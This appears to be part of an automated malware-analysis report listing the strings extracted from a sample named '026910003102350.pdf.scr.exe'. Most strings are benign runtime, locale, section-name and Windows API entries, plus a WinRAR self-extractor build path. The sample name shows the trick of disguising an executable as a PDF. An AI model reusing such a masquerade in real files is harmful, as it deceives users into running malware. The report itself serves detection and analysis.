      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wednesday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: thursday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: friday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: saturday
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: january
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: february
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: march
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: april
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: august
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: september
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: october
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: november
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: december
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mm/dd/yy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dddd, mmmm dd, yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hh:mm:ss
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: infinfnannannan(snan)nan(snan)nan(ind)nan(ind)e+000sunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:sssunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:ssen-us g
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ((((( h
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: (
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: api-ms-win-appmodel-runtime-l1-1-1<pi-ms-win-core-datetime-l1-1-1<pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-file-l2-1-1<pi-ms-win-core-localization-l1-2-1<pi-ms-win-core-localization-obsolete-l1-2-0<pi-ms-win-core-processthreads-l1-1-2<pi-ms-win-core-string-l1-1-0<pi-ms-win-core-synch-l1-2-0<pi-ms-win-core-sysinfo-l1-2-1<pi-ms-win-core-winrt-l1-1-0<pi-ms-win-core-xstate-l2-1-0api-ms-win-rtcore-ntuser-window-l1-1-0api-ms-win-security-systemfunctions-l1-1-0ext-ms-win-kernel32-package-current-l1-1-0ext-ms-win-ntuser-dialogbox-l1-1-0ext-ms-win-ntuser-windowstation-l1-1-0advapi32kernel32user32
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getcurrentpackageid
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lcmapstringex
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: localenametolcid
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ja-jpzh-cnko-krzh-twuk
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: k#cd8l2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: [aoni*{
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: elk(w
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ~ $s%r
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @b;zo]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iu+-,
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: obwq4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: v2!l.2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ^<v7w
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#inf
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#qnan
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#snan
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#ind
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ;01#inf1#qnan1#snan1#ind
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: arbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptroruhrsksqsvthtruridbesletlvltfavihyazeumkafkafohimskkkyswuzttpagutateknmrsamnglkoksyrdivar-sabg-bgca-escs-czda-dkde-deel-grfi-fifr-frhe-ilhu-huis-isit-itnl-nlnb-nopl-plpt-brro-roru-ruhr-hrsk-sksq-alsv-seth-thtr-trur-pkid-iduk-uabe-bysl-siet-eelv-lvlt-ltfa-irvi-vnhy-amaz-az-latneu-esmk-mktn-zaxh-zazu-zaaf-zaka-gefo-fohi-inmt-mtse-noms-mykk-kzky-kgsw-keuz-uz-latntt-rubn-inpa-ingu-inta-inte-inkn-inml-inmr-insa-inmn-mncy-gbgl-eskok-insyr-sydiv-mvquz-bons-zami-nzar-iqde-chen-gbes-mxfr-beit-chnl-benn-nopt-ptsr-sp-latnsv-fiaz-az-cyrlse-sems-bnuz-uz-cyrlquz-ecar-egzh-hkde-aten-aues-esfr-casr-sp-cyrlse-fiquz-pear-lyzh-sgde-luen-caes-gtfr-chhr-basmj-noar-dzzh-mode-lien-nzes-crfr-lubs-ba-latnsmj-sear-maen-iees-pafr-mcsr-ba-latnsma-noar-tnen-zaes-dosr-ba-cyrlsma-sear-omen-jmes-vesms-fiar-yeen-cbes-cosmn-fiar-syen-bzes-pear-joen-ttes-arar-lben-zwes-ecar-kwen-phes-clar-aees-uyar-bhes-pyar-qaes-boes-sves-hnes-nies-przh-chtsrx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: paf-zaar-aear-bhar-dzar-egar-iqar-joar-kwar-lbar-lyar-maar-omar-qaar-saar-syar-tnar-yeaz-az-cyrlaz-az-latnbe-bybg-bgbn-inbs-ba-latnca-escs-czcy-gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ares-boes-cles-coes-cres-does-eces-eses-gtes-hnes-mxes-nies-paes-pees-pres-pyes-sves-uyes-veet-eeeu-esfa-irfi-fifo-fofr-befr-cafr-chfr-frfr-lufr-mcgl-esgu-inhe-ilhi-inhr-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inkok-inko-krky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-bnms-mymt-mtnb-nonl-benl-nlnn-nons-zapa-inpl-plpt-brpt-ptquz-boquz-ecquz-pero-roru-rusa-inse-fise-nose-sesk-sksl-sisma-nosma-sesmj-nosmj-sesmn-fisms-fisq-alsr-ba-cyrlsr-ba-latnsr-sp-cyrlsr-sp-latnsv-fisv-sesw-kesyr-syta-inte-inth-thtn-zatr-trtt-ruuk-uaur-pkuz-uz-cyrluz-uz-latnvi-vnxh-zazh-chszh-chtzh-cnzh-hkzh-mozh-sgzh-twzu-za
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: log10
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 0log10
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?0c0c
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loglog10exppowasinacossqrt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 9=@$"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?5wg4p
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bc .=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bc .=0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <(lx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: #{ =`~r=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %s#[k
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: "b <1=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: #.x'=
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: #.x'=hbo
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?tanh
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: atan2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: floor
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ldexp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _cabs
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _hypot
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: frexp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _logb
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _nextafter
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?tanhatanatan2sincostanceilfloorfabsmodfldexp_cabs_hypotfmodfrexp_y0_y1_yn_logb_nextafter
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sinhcosh
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: conout$
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `rsds
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: d:\projects\winrar\sfx\build\sfxrar32\release\sfxrar.pdb
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$di
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$mn
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$x
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$xp+
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$yd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: l.text$yd0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$5x2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .00cfg
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xca
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xcaa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xcu
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ,.crt$xcu
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xcz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xia
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xiaa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xiac
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xic
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xiz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpx
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpxa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xta
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xtz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .gfids
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: {.rdata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$r
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$sxdata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$voltmd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: d.rdata$voltmd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$zzzdbg
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$iaa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$izz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$taa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$tzz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .xdata$x
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$7
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$7p
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .edata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 4.edata
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <.idata$2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$4l
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$r
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$rs
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .bss0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$5@
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$01
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$01pf
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$02
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$02"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindow'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitem
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enablewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowtextwd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getparent
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowpos
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlgitemtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlgitemtextw~
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsystemmetrics
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclientrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowlongw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowlongw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setprocessdefaultlayout
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringw"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: charupperw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffa<charupperw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocwm
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createwindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexwncreatewindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroywindow
